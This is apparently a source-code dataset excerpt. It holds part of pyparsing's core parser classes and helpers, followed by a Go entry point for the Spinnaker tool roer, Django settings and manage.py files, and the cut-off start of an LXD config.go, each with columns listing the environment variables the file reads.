- ``expr`` - expression that must match zero or more times
- ``default`` (optional) - value to be returned if the optional expression is not found.
Example::
# US postal code can be a 5-digit zip, plus optional 4-digit qualifier
zip = Combine(Word(nums, exact=5) + Opt('-' + Word(nums, exact=4)))
zip.run_tests('''
# traditional ZIP code
12345
# ZIP+4 form
12101-0001
# invalid ZIP
98765-
''')
prints::
# traditional ZIP code
12345
['12345']
# ZIP+4 form
12101-0001
['12101-0001']
# invalid ZIP
98765-
^
FAIL: Expected end of text (at char 5), (line:1, col:6)
"""
__optionalNotMatched = _NullToken()
def __init__(
self, expr: Union[ParserElement, str], default: Any = __optionalNotMatched
):
super().__init__(expr, savelist=False)
self.saveAsList = self.expr.saveAsList
self.defaultValue = default
self.mayReturnEmpty = True
def parseImpl(self, instring, loc, doActions=True):
self_expr = self.expr
try:
loc, tokens = self_expr._parse(instring, loc, doActions, callPreParse=False)
except (ParseException, IndexError):
default_value = self.defaultValue
if default_value is not self.__optionalNotMatched:
if self_expr.resultsName:
tokens = ParseResults([default_value])
tokens[self_expr.resultsName] = default_value
else:
tokens = [default_value]
else:
tokens = []
return loc, tokens
def _generateDefaultName(self):
inner = str(self.expr)
# strip off redundant inner {}'s
while len(inner) > 1 and inner[0 :: len(inner) - 1] == "{}":
inner = inner[1:-1]
return "[" + inner + "]"
Optional = Opt
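# Illustrative usage sketch (added note): Opt simply yields no tokens when its
# expression is absent, unless a default value is supplied.
#
#   greeting = Word(alphas) + Opt(",").suppress() + Word(alphas)
#   greeting.parse_string("Hello World")     # -> ['Hello', 'World']
#   greeting.parse_string("Hello, World")    # -> ['Hello', 'World']
#
#   qualifier = Opt("-" + Word(nums, exact=4))   # e.g. optional ZIP+4 suffix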
class SkipTo(ParseElementEnhance):
"""
Token for skipping over all undefined text until the matched
expression is found.
Parameters:
- ``expr`` - target expression marking the end of the data to be skipped
- ``include`` - if ``True``, the target expression is also parsed
(the skipped text and target expression are returned as a 2-element
list) (default= ``False``).
- ``ignore`` - (default= ``None``) used to define grammars (typically quoted strings and
comments) that might contain false matches to the target expression
- ``fail_on`` - (default= ``None``) define expressions that are not allowed to be
included in the skipped text; if found before the target expression is found,
the :class:`SkipTo` is not a match
Example::
report = '''
Outstanding Issues Report - 1 Jan 2000
# | Severity | Description | Days Open
-----+----------+-------------------------------------------+-----------
101 | Critical | Intermittent system crash | 6
94 | Cosmetic | Spelling error on Login ('log|n') | 14
79 | Minor | System slow when running too many reports | 47
'''
integer = Word(nums)
SEP = Suppress('|')
# use SkipTo to simply match everything up until the next SEP
# - ignore quoted strings, so that a '|' character inside a quoted string does not match
# - parse action will call token.strip() for each matched token, i.e., the description body
string_data = SkipTo(SEP, ignore=quoted_string)
string_data.set_parse_action(token_map(str.strip))
ticket_expr = (integer("issue_num") + SEP
+ string_data("sev") + SEP
+ string_data("desc") + SEP
+ integer("days_open"))
for tkt in ticket_expr.search_string(report):
print(tkt.dump())
prints::
['101', 'Critical', 'Intermittent system crash', '6']
- days_open: 6
- desc: Intermittent system crash
- issue_num: 101
- sev: Critical
['94', 'Cosmetic', "Spelling error on Login ('log|n')", '14']
- days_open: 14
- desc: Spelling error on Login ('log|n')
- issue_num: 94
- sev: Cosmetic
['79', 'Minor', 'System slow when running too many reports', '47']
- days_open: 47
- desc: System slow when running too many reports
- issue_num: 79
- sev: Minor
"""
def __init__(
self,
other: Union[ParserElement, str],
include: bool = False,
ignore: bool = None,
fail_on: OptionalType[Union[ParserElement, str]] = None,
*,
failOn: Union[ParserElement, str] = None,
):
super().__init__(other)
failOn = failOn or fail_on
self.ignoreExpr = ignore
self.mayReturnEmpty = True
self.mayIndexError = False
self.includeMatch = include
self.saveAsList = False
if isinstance(failOn, str_type):
self.failOn = self._literalStringClass(failOn)
else:
self.failOn = failOn
self.errmsg = "No match found for " + str(self.expr)
def parseImpl(self, instring, loc, doActions=True):
startloc = loc
instrlen = len(instring)
self_expr_parse = self.expr._parse
self_failOn_canParseNext = (
self.failOn.canParseNext if self.failOn is not None else None
)
self_ignoreExpr_tryParse = (
self.ignoreExpr.tryParse if self.ignoreExpr is not None else None
)
tmploc = loc
while tmploc <= instrlen:
if self_failOn_canParseNext is not None:
# break if failOn expression matches
if self_failOn_canParseNext(instring, tmploc):
break
if self_ignoreExpr_tryParse is not None:
# advance past ignore expressions
while 1:
try:
tmploc = self_ignoreExpr_tryParse(instring, tmploc)
except ParseBaseException:
break
try:
self_expr_parse(instring, tmploc, doActions=False, callPreParse=False)
except (ParseException, IndexError):
# no match, advance loc in string
tmploc += 1
else:
# matched skipto expr, done
break
else:
# ran off the end of the input string without matching skipto expr, fail
raise ParseException(instring, loc, self.errmsg, self)
# build up return values
loc = tmploc
skiptext = instring[startloc:loc]
skipresult = ParseResults(skiptext)
if self.includeMatch:
loc, mat = self_expr_parse(instring, loc, doActions, callPreParse=False)
skipresult += mat
return loc, skipresult
class Forward(ParseElementEnhance):
"""
Forward declaration of an expression to be defined later -
used for recursive grammars, such as algebraic infix notation.
When the expression is known, it is assigned to the ``Forward``
variable using the ``'<<'`` operator.
Note: take care when assigning to ``Forward`` not to overlook
precedence of operators.
Specifically, ``'|'`` has a lower precedence than ``'<<'``, so that::
fwd_expr << a | b | c
will actually be evaluated as::
(fwd_expr << a) | b | c
thereby leaving b and c out as parseable alternatives. It is recommended that you
explicitly group the values inserted into the ``Forward``::
fwd_expr << (a | b | c)
Converting to use the ``'<<='`` operator instead will avoid this problem.
See :class:`ParseResults.pprint` for an example of a recursive
parser created using ``Forward``.
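A minimal sketch of the recommended form (the names below are illustrative only)::
value = Forward()
# parenthesize the alternatives so the whole set is attached to ``value``
value <<= (Word(nums) | '(' + value + ')')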
"""
def __init__(self, other: OptionalType[Union[ParserElement, str]] = None):
self.caller_frame = traceback.extract_stack(limit=2)[0]
super().__init__(other, savelist=False)
self.lshift_line = None
def __lshift__(self, other):
if hasattr(self, "caller_frame"):
del self.caller_frame
if isinstance(other, str_type):
other = self._literalStringClass(other)
self.expr = other
self.mayIndexError = self.expr.mayIndexError
self.mayReturnEmpty = self.expr.mayReturnEmpty
self.set_whitespace_chars(
self.expr.whiteChars, copy_defaults=self.expr.copyDefaultWhiteChars
)
self.skipWhitespace = self.expr.skipWhitespace
self.saveAsList = self.expr.saveAsList
self.ignoreExprs.extend(self.expr.ignoreExprs)
self.lshift_line = traceback.extract_stack(limit=2)[-2]
return self
def __ilshift__(self, other):
return self << other
def __or__(self, other):
caller_line = traceback.extract_stack(limit=2)[-2]
if (
__diag__.warn_on_match_first_with_lshift_operator
and caller_line == self.lshift_line
and Diagnostics.warn_on_match_first_with_lshift_operator
not in self.suppress_warnings_
):
warnings.warn(
"using '<<' operator with '|' is probably an error, use '<<='",
stacklevel=2,
)
ret = super().__or__(other)
return ret
def __del__(self):
# see if we are getting dropped because of '=' reassignment of var instead of '<<=' or '<<'
if (
self.expr is None
and __diag__.warn_on_assignment_to_Forward
and Diagnostics.warn_on_assignment_to_Forward not in self.suppress_warnings_
):
warnings.warn_explicit(
"Forward defined here but no expression attached later using '<<=' or '<<'",
UserWarning,
filename=self.caller_frame.filename,
lineno=self.caller_frame.lineno,
)
def parseImpl(self, instring, loc, doActions=True):
if (
self.expr is None
and __diag__.warn_on_parse_using_empty_Forward
and Diagnostics.warn_on_parse_using_empty_Forward
not in self.suppress_warnings_
):
# walk stack until parse_string, scan_string, search_string, or transform_string is found
parse_fns = [
"parse_string",
"scan_string",
"search_string",
"transform_string",
]
tb = traceback.extract_stack(limit=200)
for i, frm in enumerate(reversed(tb), start=1):
if frm.name in parse_fns:
stacklevel = i + 1
break
else:
stacklevel = 2
warnings.warn(
"Forward expression was never assigned a value, will not parse any input",
stacklevel=stacklevel,
)
if not ParserElement._left_recursion_enabled:
return super().parseImpl(instring, loc, doActions)
# ## Bounded Recursion algorithm ##
# Recursion only needs to be processed at ``Forward`` elements, since they are
# the only ones that can actually refer to themselves. The general idea is
# to handle recursion stepwise: We start at no recursion, then recurse once,
# recurse twice, ..., until more recursion offers no benefit (we hit the bound).
#
# The "trick" here is that each ``Forward`` gets evaluated in two contexts
# - to *match* a specific recursion level, and
# - to *search* the bounded recursion level
# and the two run concurrently. The *search* must *match* each recursion level
# to find the best possible match. This is handled by a memo table, which
# provides the previous match to the next level match attempt.
#
# See also "Left Recursion in Parsing Expression Grammars", Medeiros et al.
#
# There is a complication since we not only *parse* but also *transform* via
# actions: We do not want to run the actions too often while expanding. Thus,
# we expand using `doActions=False` and only run `doActions=True` if the next
# recursion level is acceptable.
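#
# A rough illustration (grammar and input are hypothetical, for exposition only):
# given ``expr <<= expr + '+' + num | num`` and the input "1+2+3", the memo entry
# at loc 0 grows stepwise from matching "1", to "1+2", to "1+2+3"; the loop below
# stops once one more expansion no longer advances the match location.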
with ParserElement.recursion_lock:
memo = ParserElement.recursion_memos
try:
# we are parsing at a specific recursion expansion - use it as-is
prev_loc, prev_result = memo[loc, self, doActions]
if isinstance(prev_result, Exception):
raise prev_result
return prev_loc, prev_result.copy()
except KeyError:
act_key = (loc, self, True)
peek_key = (loc, self, False)
# we are searching for the best recursion expansion - keep on improving
# both `doActions` cases must be tracked separately here!
prev_loc, prev_peek = memo[peek_key] = (
loc - 1,
ParseException(
instring, loc, "Forward recursion without base case", self
),
)
if doActions:
memo[act_key] = memo[peek_key]
while True:
try:
new_loc, new_peek = super().parseImpl(instring, loc, False)
except ParseException:
# we failed before getting any match – do not hide the error
if isinstance(prev_peek, Exception):
raise
new_loc, new_peek = prev_loc, prev_peek
# the match did not get better: we are done
if new_loc <= prev_loc:
if doActions:
# replace the match for doActions=False as well,
# in case the action did backtrack
prev_loc, prev_result = memo[peek_key] = memo[act_key]
del memo[peek_key], memo[act_key]
return prev_loc, prev_result.copy()
del memo[peek_key]
return prev_loc, prev_peek.copy()
# the match did get better: see if we can improve further
else:
if doActions:
try:
memo[act_key] = super().parseImpl(instring, loc, True)
except ParseException as e:
memo[peek_key] = memo[act_key] = (new_loc, e)
raise
prev_loc, prev_peek = memo[peek_key] = new_loc, new_peek
def leave_whitespace(self, recursive=True):
self.skipWhitespace = False
return self
def ignore_whitespace(self, recursive=True):
self.skipWhitespace = True
return self
def streamline(self):
if not self.streamlined:
self.streamlined = True
if self.expr is not None:
self.expr.streamline()
return self
def validate(self, validateTrace=None):
if validateTrace is None:
validateTrace = []
if self not in validateTrace:
tmp = validateTrace[:] + [self]
if self.expr is not None:
self.expr.validate(tmp)
self._checkRecursion([])
def _generateDefaultName(self):
# Avoid infinite recursion by setting a temporary _defaultName
self._defaultName = ": ..."
# Use the string representation of main expression.
retString = "..."
try:
if self.expr is not None:
retString = str(self.expr)[:1000]
else:
retString = "None"
finally:
return self.__class__.__name__ + ": " + retString
def copy(self):
if self.expr is not None:
return super().copy()
else:
ret = Forward()
ret <<= self
return ret
def _setResultsName(self, name, list_all_matches=False):
if (
__diag__.warn_name_set_on_empty_Forward
and Diagnostics.warn_name_set_on_empty_Forward
not in self.suppress_warnings_
):
if self.expr is None:
warnings.warn(
"{}: setting results name {!r} on {} expression "
"that has no contained expression".format(
"warn_name_set_on_empty_Forward", name, type(self).__name__
),
stacklevel=3,
)
return super()._setResultsName(name, list_all_matches)
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class TokenConverter(ParseElementEnhance):
"""
Abstract subclass of :class:`ParseElementEnhance`, for converting parsed results.
"""
def __init__(self, expr: Union[ParserElement, str], savelist=False):
super().__init__(expr) # , savelist)
self.saveAsList = False
class Combine(TokenConverter):
"""Converter to concatenate all matching tokens to a single string.
By default, the matching patterns must also be contiguous in the
input string; this can be disabled by specifying
``'adjacent=False'`` in the constructor.
Example::
real = Word(nums) + '.' + Word(nums)
print(real.parse_string('3.1416')) # -> ['3', '.', '1416']
# will also erroneously match the following
print(real.parse_string('3. 1416')) # -> ['3', '.', '1416']
real = Combine(Word(nums) + '.' + Word(nums))
print(real.parse_string('3.1416')) # -> ['3.1416']
# no match when there are internal spaces
print(real.parse_string('3. 1416')) # -> Exception: Expected W:(0123...)
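# an illustrative sketch (the name ``real_loose`` is made up): adjacent=False
# allows whitespace between the pieces and still joins them into one token
real_loose = Combine(Word(nums) + '.' + Word(nums), adjacent=False)
print(real_loose.parse_string('3. 1416')) # -> ['3.1416']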
"""
def __init__(
self,
expr: ParserElement,
join_string: str = "",
adjacent: bool = True,
*,
joinString: OptionalType[str] = None,
):
super().__init__(expr)
joinString = joinString if joinString is not None else join_string
# suppress whitespace-stripping in contained parse expressions, but re-enable it on the Combine itself
if adjacent:
self.leave_whitespace()
self.adjacent = adjacent
self.skipWhitespace = True
self.joinString = joinString
self.callPreparse = True
def ignore(self, other):
if self.adjacent:
ParserElement.ignore(self, other)
else:
super().ignore(other)
return self
def postParse(self, instring, loc, tokenlist):
retToks = tokenlist.copy()
del retToks[:]
retToks += ParseResults(
["".join(tokenlist._asStringList(self.joinString))], modal=self.modalResults
)
if self.resultsName and retToks.haskeys():
return [retToks]
else:
return retToks
class Group(TokenConverter):
"""Converter to return the matched tokens as a list - useful for
returning tokens of :class:`ZeroOrMore` and :class:`OneOrMore` expressions.
The optional ``aslist`` argument when set to True will return the
parsed tokens as a Python list instead of a pyparsing ParseResults.
Example::
ident = Word(alphas)
num = Word(nums)
term = ident | num
func = ident + Opt(delimited_list(term))
print(func.parse_string("fn a, b, 100"))
# -> ['fn', 'a', 'b', '100']
func = ident + Group(Opt(delimited_list(term)))
print(func.parse_string("fn a, b, 100"))
# -> ['fn', ['a', 'b', '100']]
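# an illustrative sketch of ``aslist`` (the name ``func_as_list`` is made up)
func_as_list = ident + Group(Opt(delimited_list(term)), aslist=True)
print(func_as_list.parse_string("fn a, b, 100"))
# -> ['fn', ['a', 'b', '100']], with the grouped value as a plain Python list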
"""
def __init__(self, expr: ParserElement, aslist: bool = False):
super().__init__(expr)
self.saveAsList = True
self._asPythonList = aslist
def postParse(self, instring, loc, tokenlist):
if self._asPythonList:
return ParseResults.List(
tokenlist.asList()
if isinstance(tokenlist, ParseResults)
else list(tokenlist)
)
else:
return [tokenlist]
class Dict(TokenConverter):
"""Converter to return a repetitive expression as a list, but also
as a dictionary. Each element can also be referenced using the first
token in the expression as its key. Useful for tabular report
scraping when the first column can be used as an item key.
The optional ``asdict`` argument when set to True will return the
parsed tokens as a Python dict instead of a pyparsing ParseResults.
Example::
data_word = Word(alphas)
label = data_word + FollowedBy(':')
text = "shape: SQUARE posn: upper left color: light blue texture: burlap"
attr_expr = (label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join))
# print attributes as plain groups
print(OneOrMore(attr_expr).parse_string(text).dump())
# instead of OneOrMore(expr), parse using Dict(OneOrMore(Group(expr))) - Dict will auto-assign names
result = Dict(OneOrMore(Group(attr_expr))).parse_string(text)
print(result.dump())
# access named fields as dict entries, or output as dict
print(result['shape'])
print(result.as_dict())
prints::
['shape', 'SQUARE', 'posn', 'upper left', 'color', 'light blue', 'texture', 'burlap']
[['shape', 'SQUARE'], ['posn', 'upper left'], ['color', 'light blue'], ['texture', 'burlap']]
- color: light blue
- posn: upper left
- shape: SQUARE
- texture: burlap
SQUARE
{'color': 'light blue', 'posn': 'upper left', 'texture': 'burlap', 'shape': 'SQUARE'}
See more examples at :class:`ParseResults` of accessing fields by results name.
"""
def __init__(self, expr: ParserElement, asdict: bool = False):
super().__init__(expr)
self.saveAsList = True
self._asPythonDict = asdict
def postParse(self, instring, loc, tokenlist):
for i, tok in enumerate(tokenlist):
if len(tok) == 0:
continue
ikey = tok[0]
if isinstance(ikey, int):
ikey = str(ikey).strip()
if len(tok) == 1:
tokenlist[ikey] = _ParseResultsWithOffset("", i)
elif len(tok) == 2 and not isinstance(tok[1], ParseResults):
tokenlist[ikey] = _ParseResultsWithOffset(tok[1], i)
else:
try:
dictvalue = tok.copy() # ParseResults(i)
except Exception:
exc = TypeError(
"could not extract dict values from parsed results"
" - Dict expression must contain Grouped expressions"
)
raise exc from None
del dictvalue[0]
if len(dictvalue) != 1 or (
isinstance(dictvalue, ParseResults) and dictvalue.haskeys()
):
tokenlist[ikey] = _ParseResultsWithOffset(dictvalue, i)
else:
tokenlist[ikey] = _ParseResultsWithOffset(dictvalue[0], i)
if self._asPythonDict:
return [tokenlist.as_dict()] if self.resultsName else tokenlist.as_dict()
else:
return [tokenlist] if self.resultsName else tokenlist
class Suppress(TokenConverter):
"""Converter for ignoring the results of a parsed expression.
Example::
source = "a, b, c,d"
wd = Word(alphas)
wd_list1 = wd + ZeroOrMore(',' + wd)
print(wd_list1.parse_string(source))
# often, delimiters that are useful during parsing are just in the
# way afterward - use Suppress to keep them out of the parsed output
wd_list2 = wd + ZeroOrMore(Suppress(',') + wd)
print(wd_list2.parse_string(source))
# Skipped text (using '...') can be suppressed as well
source = "lead in START relevant text END trailing text"
start_marker = Keyword("START")
end_marker = Keyword("END")
find_body = Suppress(...) + start_marker + ... + end_marker
print(find_body.parse_string(source))
prints::
['a', ',', 'b', ',', 'c', ',', 'd']
['a', 'b', 'c', 'd']
['START', 'relevant text ', 'END']
(See also :class:`delimited_list`.)
"""
def __init__(self, expr: Union[ParserElement, str], savelist: bool = False):
if expr is ...:
expr = _PendingSkip(NoMatch())
super().__init__(expr)
def __add__(self, other):
if isinstance(self.expr, _PendingSkip):
return Suppress(SkipTo(other)) + other
else:
return super().__add__(other)
def __sub__(self, other):
if isinstance(self.expr, _PendingSkip):
return Suppress(SkipTo(other)) - other
else:
return super().__sub__(other)
def postParse(self, instring, loc, tokenlist):
return []
def suppress(self):
return self
def trace_parse_action(f: ParseAction):
"""Decorator for debugging parse actions.
When the parse action is called, this decorator will print
``">> entering method-name(line:<current_source_line>, <parse_location>, <matched_tokens>)"``.
When the parse action completes, the decorator will print
``"<<"`` followed by the returned value, or any exception that the parse action raised.
Example::
wd = Word(alphas)
@trace_parse_action
def remove_duplicate_chars(tokens):
return ''.join(sorted(set(''.join(tokens))))
wds = OneOrMore(wd).set_parse_action(remove_duplicate_chars)
print(wds.parse_string("slkdjs sld sldd sdlf sdljf"))
prints::
>>entering remove_duplicate_chars(line: 'slkdjs sld sldd sdlf sdljf', 0, (['slkdjs', 'sld', 'sldd', 'sdlf', 'sdljf'], {}))
<<leaving remove_duplicate_chars (ret: 'dfjkls')
['dfjkls']
"""
f = _trim_arity(f)
def z(*paArgs):
thisFunc = f.__name__
s, l, t = paArgs[-3:]
if len(paArgs) > 3:
thisFunc = paArgs[0].__class__.__name__ + "." + thisFunc
sys.stderr.write(
">>entering {}(line: {!r}, {}, {!r})\n".format(thisFunc, line(l, s), l, t)
)
try:
ret = f(*paArgs)
except Exception as exc:
sys.stderr.write("<<leaving {} (exception: {})\n".format(thisFunc, exc))
raise
sys.stderr.write("<<leaving {} (ret: {!r})\n".format(thisFunc, ret))
return ret
z.__name__ = f.__name__
return z
# convenience constants for positional expressions
empty = Empty().set_name("empty")
line_start = LineStart().set_name("line_start")
line_end = LineEnd().set_name("line_end")
string_start = StringStart().set_name("string_start")
string_end = StringEnd().set_name("string_end")
_escapedPunc = Word(_bslash, r"\[]-*.$+^?()~ ", exact=2).set_parse_action(
lambda s, l, t: t[0][1]
)
_escapedHexChar = Regex(r"\\0?[xX][0-9a-fA-F]+").set_parse_action(
lambda s, l, t: chr(int(t[0].lstrip(r"\0x"), 16))
)
_escapedOctChar = Regex(r"\\0[0-7]+").set_parse_action(
lambda s, l, t: chr(int(t[0][1:], 8))
)
_singleChar = (
_escapedPunc | _escapedHexChar | _escapedOctChar | CharsNotIn(r"\]", exact=1)
)
_charRange = Group(_singleChar + Suppress("-") + _singleChar)
_reBracketExpr = (
Literal("[")
+ Opt("^").set_results_name("negate")
+ Group(OneOrMore(_charRange | _singleChar)).set_results_name("body")
+ "]"
)
def srange(s):
r"""Helper to easily define string ranges for use in :class:`Word`
construction. Borrows syntax from regexp ``'[]'`` string range
definitions::
srange("[0-9]") -> "0123456789"
srange("[a-z]") -> "abcdefghijklmnopqrstuvwxyz"
srange("[a-z$_]") -> "abcdefghijklmnopqrstuvwxyz$_"
The input string must be enclosed in []'s, and the returned string
is the expanded character set joined into a single string. The
values enclosed in the []'s may be:
- a single character
- an escaped character with a leading backslash (such as ``\-``
or ``\]``)
- an escaped hex character with a leading ``'\x'``
(``\x21``, which is a ``'!'`` character) (``\0x##``
is also supported for backwards compatibility)
- an escaped octal character with a leading ``'\0'``
(``\041``, which is a ``'!'`` character)
- a range of any of the above, separated by a dash (``'a-z'``,
etc.)
- any combination of the above (``'aeiouy'``,
``'a-zA-Z0-9_$'``, etc.)
"""
_expanded = (
lambda p: p
if not isinstance(p, ParseResults)
else "".join(chr(c) for c in range(ord(p[0]), ord(p[1]) + 1))
)
try:
return "".join(_expanded(part) for part in _reBracketExpr.parse_string(s).body)
except Exception:
return ""
def token_map(func, *args):
"""Helper to define a parse action by mapping a function to all
elements of a :class:`ParseResults` list. If any additional args are passed,
they are forwarded to the given function as additional arguments
after the token, as in
``hex_integer = Word(hexnums).set_parse_action(token_map(int, 16))``,
which will convert the parsed data to an integer using base 16.
Example (compare the last example to the one in :class:`ParserElement.transform_string`)::
hex_ints = OneOrMore(Word(hexnums)).set_parse_action(token_map(int, 16))
hex_ints.run_tests('''
00 11 22 aa FF 0a 0d 1a
''')
upperword = Word(alphas).set_parse_action(token_map(str.upper))
OneOrMore(upperword).run_tests('''
my kingdom for a horse
''')
wd = Word(alphas).set_parse_action(token_map(str.title))
OneOrMore(wd).set_parse_action(' '.join).run_tests('''
now is the winter of our discontent made glorious summer by this sun of york
''')
prints::
00 11 22 aa FF 0a 0d 1a
[0, 17, 34, 170, 255, 10, 13, 26]
my kingdom for a horse
['MY', 'KINGDOM', 'FOR', 'A', 'HORSE']
now is the winter of our discontent made glorious summer by this sun of york
['Now Is The Winter Of Our Discontent Made Glorious Summer By This Sun Of York']
"""
def pa(s, l, t):
return [func(tokn, *args) for tokn in t]
func_name = getattr(func, "__name__", getattr(func, "__class__").__name__)
pa.__name__ = func_name
return pa
def autoname_elements():
"""
Utility to simplify mass-naming of parser elements, for
generating railroad diagrams with named subdiagrams.
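Illustrative sketch (the element names below are made up)::
integer = Word(nums)
identifier = Word(alphas)
autoname_elements() # both now carry the names "integer" and "identifier"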
"""
for name, var in sys._getframe().f_back.f_locals.items():
if isinstance(var, ParserElement) and not var.customName:
var.set_name(name)
dbl_quoted_string = Combine(
Regex(r'"(?:[^"\n\r\\]|(?:"")|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*') + '"'
).set_name("string enclosed in double quotes")
sgl_quoted_string = Combine(
Regex(r"'(?:[^'\n\r\\]|(?:'')|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*") + "'"
).set_name("string enclosed in single quotes")
quoted_string = Combine(
Regex(r'"(?:[^"\n\r\\]|(?:"")|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*') + '"'
| Regex(r"'(?:[^'\n\r\\]|(?:'')|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*") + "'"
).set_name("quotedString using single or double quotes")
unicode_string = Combine("u" + quoted_string.copy()).set_name("unicode string literal")
alphas8bit = srange(r"[\0xc0-\0xd6\0xd8-\0xf6\0xf8-\0xff]")
punc8bit = srange(r"[\0xa1-\0xbf\0xd7\0xf7]")
# build list of built-in expressions, for future reference if a global default value
# gets updated
_builtin_exprs = [v for v in vars().values() if isinstance(v, ParserElement)]
# backward compatibility names
tokenMap = token_map
conditionAsParseAction = condition_as_parse_action
nullDebugAction = null_debug_action
sglQuotedString = sgl_quoted_string
dblQuotedString = dbl_quoted_string
quotedString = quoted_string
unicodeString = unicode_string
lineStart = line_start
lineEnd = line_end
stringStart = string_start
stringEnd = string_end
traceParseAction = trace_parse_action
| []
| []
| [
"PYPARSINGENABLEALLWARNINGS"
]
| [] | ["PYPARSINGENABLEALLWARNINGS"] | python | 1 | 0 | |
cmd/roer/main.go | package main
import (
"os"
"github.com/sirupsen/logrus"
"github.com/spinnaker/roer/cmd"
"github.com/spinnaker/roer/spinnaker"
)
// version is set via ldflags
var version = "dev"
func main() {
// TODO rz - Don't really like this bit. Standardize a spinnaker config file.
// maybe worthwhile splitting out this spinnaker API into a standard lib...
if os.Getenv("SPINNAKER_API") == "" {
logrus.Fatal("SPINNAKER_API must be set")
}
config := spinnaker.ClientConfig{
Endpoint: os.Getenv("SPINNAKER_API"),
HTTPClientFactory: spinnaker.DefaultHTTPClientFactory,
}
if err := cmd.NewRoer(version, config).Run(os.Args); err != nil {
os.Exit(1)
}
}
| [
"\"SPINNAKER_API\"",
"\"SPINNAKER_API\""
]
| []
| [
"SPINNAKER_API"
]
| [] | ["SPINNAKER_API"] | go | 1 | 0 | |
spotify/settings/base.py | import logging.config
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = int(os.environ.get("DEBUG", default=0))
# 'DJANGO_ALLOWED_HOSTS' should be a single string of hosts with a space between each.
# For example: 'DJANGO_ALLOWED_HOSTS=localhost 127.0.0.1 [::1]'
ALLOWED_HOSTS = os.environ.get("DJANGO_ALLOWED_HOSTS").split(" ")
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"debug_toolbar",
"spotify_app",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
ROOT_URLCONF = "spotify_project.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [os.path.join(BASE_DIR, "templates")],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"spotify_app.api_endpoints.user_context",
],
},
},
]
WSGI_APPLICATION = "spotify_project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": os.environ.get("SQL_ENGINE", "django.db.backends.postgresql"),
"NAME": os.environ.get("SQL_DATABASE", "spotify"),
"USER": os.environ.get("SQL_USER", "postgres"),
"PASSWORD": os.environ.get("SQL_PASSWORD", "postgres"),
"HOST": os.environ.get("SQL_HOST", "localhost"),
"PORT": os.environ.get("SQL_PORT", 5432),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator", },
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator", },
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator", },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "Europe/Warsaw"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = "/static/"
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATIC_ROOT = BASE_DIR + "static"
INTERNAL_IPS = [
"127.0.0.1",
]
LOGGING_CONFIG = None
logging.config.dictConfig(
{
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"console": {"format": '%(asctime)s %(name)-12s %(levelname)-8s %(message)s', },
},
"handlers": {
"console": {"class": "logging.StreamHandler", "formatter": "console", },
},
"loggers": {'spotify_app': {"level": "DEBUG", "handlers": ["console"]}, },
}
)
| []
| []
| [
"SQL_PASSWORD",
"SQL_ENGINE",
"SQL_HOST",
"SQL_DATABASE",
"SQL_USER",
"SECRET_KEY",
"SQL_PORT",
"DEBUG",
"DJANGO_ALLOWED_HOSTS"
]
| [] | ["SQL_PASSWORD", "SQL_ENGINE", "SQL_HOST", "SQL_DATABASE", "SQL_USER", "SECRET_KEY", "SQL_PORT", "DEBUG", "DJANGO_ALLOWED_HOSTS"] | python | 9 | 0 | |
backend/manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "root.settings.dev")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
lxc/config.go | package main
import (
"fmt"
"io/ioutil"
"os"
"os/exec"
"strings"
"github.com/gosexy/gettext"
"github.com/lxc/lxd"
"github.com/lxc/lxd/shared"
"gopkg.in/yaml.v2"
)
type configCmd struct {
httpAddr string
}
func (c *configCmd) showByDefault() bool {
return true
}
var profileEditHelp string = gettext.Gettext(
"### This is a yaml representation of the profile.\n" +
"### Any line starting with a '# will be ignored.\n" +
"###\n" +
"### A profile consists of a set of configuration items followed by a set of\n" +
"### devices.\n" +
"###\n" +
"### An example would look like:\n" +
"### name: onenic\n" +
"### config:\n" +
"### raw.lxc: lxc.aa_profile=unconfined\n" +
